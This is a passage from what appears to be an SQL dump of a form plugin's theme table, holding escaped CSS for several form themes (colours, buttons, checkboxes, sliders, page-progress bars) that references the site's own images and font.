middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #88B4BD;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #678B94;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #678B94;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #88B4BD;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #678B94;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(15,'Theme 04 red','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #CEE4E4;\r\nmargin-bottom: 10px;\r\ncolor: #CEE4E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #C09F97;\r\nbackground: #86A0A7;\r\nbackground: -moz-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -webkit-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -o-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -ms-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: linear-gradient(to bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #C09F97;\r\nbackground: #86A0A7;\r\nbackground: -moz-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -webkit-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -o-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -ms-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: linear-gradient(to bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E0D0CD;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\nmargin: 16px 10px 16px 0px;\r\ndisplay: inline-block;\r\nbackground: url([SITE_ROOT]/images/04/03/bg.png) no-repeat;\r\ntext-align: left;\r\nborder-radius: 0px;\r\nwidth: 300px;\r\npadding: 5px 10px;\r\ntext-align: center;\r\nfont-size: 18px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #B98476 ;\r\nbackground: -moz-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -webkit-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -o-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -ms-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: linear-gradient(to bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #9B766D;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #CCAAA3;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #8A6B63;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #8A6B63;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #CCAAA3;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #8A6B63;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(16,'Theme 04 transparent (gray button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #FFFFFF;\r\nborder: 1px solid #A6A6A6;\r\nmargin-bottom: 10px;\r\ncolor: #A6A6A6;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #B3B3B3 !important;\r\n	color: 